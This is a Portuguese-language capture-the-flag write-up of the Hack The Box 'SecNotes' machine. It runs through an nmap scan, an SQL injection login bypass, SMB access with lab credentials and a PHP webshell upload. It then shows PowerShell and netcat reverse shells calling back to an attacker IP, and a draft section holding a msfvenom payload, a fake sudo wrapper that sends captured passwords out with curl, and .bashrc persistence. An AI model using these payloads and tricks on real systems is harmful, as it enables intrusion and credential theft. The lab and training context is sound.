Hack The Box - SecNotes

Enumeration

Usando o autorecon podemos agilizar o processo

# Nmap 7.80 scan initiated Tue Jul 14 12:52:55 2020 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /root/HTB-Windows/secnotes/results/10.10.10.97/scans/_full_tcp_nmap.txt -oX /root/HTB-Windows/secnotes/results/10.10.10.97/scans/xml/_full_tcp_nmap.xml 10.10.10.97
Nmap scan report for 10.10.10.97
Host is up, received user-set (0.40s latency).
Scanned at 2020-07-14 12:52:59 EDT for 920s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT     STATE SERVICE      REASON          VERSION
80/tcp   open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp  open  microsoft-ds syn-ack ttl 127 Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=7/14%OT=80%CT=%CU=%PV=Y%DS=2%DC=T%G=N%TM=5F0DE683%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=109%TI=RD%II=I%TS=U)
SEQ(SP=106%GCD=1%ISR=109%TI=RD%TS=U)
OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O6=M54DNNS)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)
ECN(R=Y%DF=Y%TG=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=Y%DFI=N%TG=80%CD=Z)

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h19m52s, deviation: 4h02m33s, median: -10s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 25086/tcp): CLEAN (Timeout)
|   Check 2 (port 9222/tcp): CLEAN (Timeout)
|   Check 3 (port 53444/udp): CLEAN (Timeout)
|   Check 4 (port 51444/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2020-07-14T10:07:36-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-07-14T17:07:30
|_  start_date: N/A

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   366.33 ms 10.10.14.1
2   385.27 ms 10.10.10.97

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jul 14 13:08:19 2020 -- 1 IP address (1 host up) scanned in 925.90 seconds

Temos entao, 3 portas abertas 80 445 8808

Navegando ate a porta 80 temos uma tela de login

na port 8808 temos um IIS 10

Comeco entao pela porta 80, criei um user mas nada de interessante.. Entao resolvi tentar tecnicas de SQLI para bypass de auth

reference https://github.com/payloadbox/sql-injection-payload-list

Usando a primeiro payload encontrado na aba SQL Injection Auth Bypass Payloads

login: '-' password: 123456

Consigo acesso a informacoes com um nivel mais elevado e uma das notas encontro um login

com essa cred tento entao acesso ao SMB usando crackmapexec

\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&

crackmapexec smb 10.10.10.97 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --shares

Conseguimos mais algumas informacoes importantes como a versao do windows e um share com permissao de escrite e leitura

Em seguida monto entao esse share no meu kali

reference https://book.hacktricks.xyz/pentesting/pentesting-smb

mount -t cifs -o username=tyler,password='92g!mA8BGjOirkL%OG*&' //10.10.10.97/new-site /mnt/new-site

Lembra? eu tenho permissao de escrita.. fiz um teste entao escrevendo um arquivo de texto simples e acessando ele na porta 8808 http://10.10.10.97:8808/anakein.txt tentei tbm escrever uma webshell bem conhecida Antak

Veja, a webshell nao carregava mais o arquivo de texto sim.

de imediato fiquei tentando fazer bypass e usar outras tecnicas mas sem sucesso

depois de enviar uma webshell em .php tive sucesso

aah. mas antes disso eu observei que o arquivo enviado depois de alguns minutos era apagado…

continuandoo..

depois de enviar uma webshell em PHP rapidamente tenho uma webshell ativa…

reference https://gist.githubusercontent.com/joswr1ght/22f40787de19d80d110b37fb79ac3985/raw/9377612eeea89aed2b226a870e76ac12965d6694/easy-simple-php-webshell.php

https://gist.github.com/joswr1ght/22f40787de19d80d110b37fb79ac3985

tambem usei isso como referencia https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/

## Reverse Shell

com um dos melhores repo que eu conheco o nishang rapidamente tenho uma rev shell em powershell

reference https://github.com/samratashok/nishang

Primeiro ative o seu web server no repo do nishang, eu sempre uso o modulo do py para agilizar por ele ser simples

python -m SimplesHTTPServer 80

em seguida ativo o listener na port 53

rlwrap nc -nlvp 53

e entao na nossa webshell eu executo

 powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.55/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.55 -Port 53

Get User

Privilege Escalation

Depois de usar diversas tools de enumeracao para privesc nao tinha sucesso nenhum… comcei entao a investigar o que tinha disponivel no Desktop de tyler, entao achei algo suspeito bash.lnk

executando o path direto eu tinha um bash e como sabemos isso trata-se do wsl Windows Subsystem for Linux

C:\Windows\System32\bash.exe --version

comecei entao a pesquisar termos como Abusing wsl e encontrei muito material, um deles que me ajudou bastante foi este PDF http://archive.hack.lu/2018/A_Cervoise-Backdoor_Bash_on_Windows.pdf

Depois de ler o pdf rapidamente tenho uma reverse shell de root

C:\Windows\System32\bash.exe -c "mknPS C:\inetpub\new-site>C:\Windows\System32\bash.exe -c "mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 10.10.14.55 53 1>/tmp/backpipe"

Spawn Shell

python -c 'import pty;pty.spawn("/bin/bash")'

apois isso comeco a usar tbm os scripts de privesc para windows, mas sem resultados

comeco entao o traballho manual de pesquisa, port hash, password, login alguma coisa do tipo

entao, no dir do root encontro um bash_history com o login do Administrator

Com o login do administrator usando o winexe temos uma shell de ADMINISTRATOR

winexe -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe

Rascunho

smbclient //192.168.1.108/raj


\\10.10.10.97\new-site
tyler / 92g!mA8BGjOirkL%OG*&



crackmapexec smb 10.10.10.97 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --shares



smbmap -u "tyler" -p "92g!mA8BGjOirkL%OG*&" -R new-site -H 10.10.10.97 -P 445


mount -t cifs -o username=tyler,password='92g!mA8BGjOirkL%OG*&' //10.10.10.97/new-site /mnt/new-site



./psexec.py secnotes.htb/tyler:'92g!mA8BGjOirkL%OG*&'@10.10.10.97


 

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.55 LPORT=53 -f exe -o reverse.exe

copy \\10.10.14.55\tools\reverse.exe C:\windows\temp\reverse.exe



dir C:\temp\


dir C:\windows\temp


.\C:\windows\temp\reverse.exe


copy \\10.10.14.55\tools\reverse.exe C:\Users\tyler\AppData\Local\Temp\
C:\Users\tyler\AppData\Local\Temp\reverse.exe

SafetyKatz.exe


powershell iex (New-Object Net.WebClient).DownloadString('http://10.10.14.55/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.55 -Port 53




powershell -c start -verb runas cmd '/c start /D "whoami" bash.exe



C:\Distros\Ubuntu\temp\shell.sh



rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.55 443 >/tmp/f



C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalStaterootfs\etc\shadow

mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 10.10.14.55 443 1>/tmp/backpipe


echo "echo $sudopass>> .hidden/pass.txt" >> .hidden/sudo
echo "curl http://10.10.14.55:81/?$sudopass" >> .hidden/sudo



mkdir .hidden
echo "export PATH=\$HOME/.hidden/:\$PATH:" >> .bashrc
echo "read -sp\"[sudo] password for $USER: \" sudopass" > .hidden/sudo
echo "echo \"\"" >> .hidden/sudo
echo "sleep 2" >> .hidden/sudo
echo "echo \"Sorry, try again.\"" >> .hidden/sudo
echo "echo $sudopass>> .hidden/pass.txt" >> .hidden/sudo
echo "/usr/bin/sudo\$1" >> .hidden/sudo
chmod+x .hidden/sudo


echo "echo $sudopass >> .hidden/pass.txt" >> .hidden/sudo
echo "curl http://10.10.14.55:81/?$sudopass" >> .hidden/sudo




echo "./.call-me.sh" >> .bashrc
echo "icacls.exe \"\\\\\\\\10.10.14.55\\\\tools\\\\\" > /dev/null 2>&1" >> .call-me.sh
chmod u+x .call-me.sh




C:\Windows\System32\bash.exe -c "mknod /tmp/backpipe4 p && /bin/sh 0</tmp/backpipe4 | nc 10.10.14.55 53 1>/tmp/backpipe4"



smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c


winexe -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' //10.10.10.97 cmd.exe